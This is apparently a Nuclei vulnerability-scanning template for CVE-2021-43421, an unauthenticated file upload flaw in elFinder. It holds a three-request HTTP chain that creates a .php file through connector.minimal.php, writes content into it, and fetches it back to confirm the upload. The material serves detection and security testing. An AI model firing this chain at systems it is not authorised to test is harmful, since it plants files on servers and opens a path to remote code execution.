id: CVE-2021-43421 info: name: Studio-42 elFinder <2.1.60 - Arbitrary File Upload author: akincibor severity: critical description: | Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code. reference: - https://github.com/Studio-42/elFinder/issues/3429 - https://twitter.com/infosec_90/status/1455180286354919425 - https://nvd.nist.gov/vuln/detail/CVE-2021-43421 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-43421 cwe-id: CWE-434 epss-score: 0.02563 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: max-request: 3 verified: true vendor: std42 product: elfinder tags: cve,cve2021,elfinder,fileupload,rce,intrusive http: - raw: - | GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1 Host: {{Hostname}} Accept: */* - | GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1 Host: {{Hostname}} - | GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1 Host: {{Hostname}} Accept: */* req-condition: true matchers: - type: dsl dsl: - 'contains(body_3, "{{randstr_1}}")' - "status_code == 200" condition: and extractors: - type: regex name: hash group: 1 regex: - '"hash"\:"(.*?)"\,' internal: true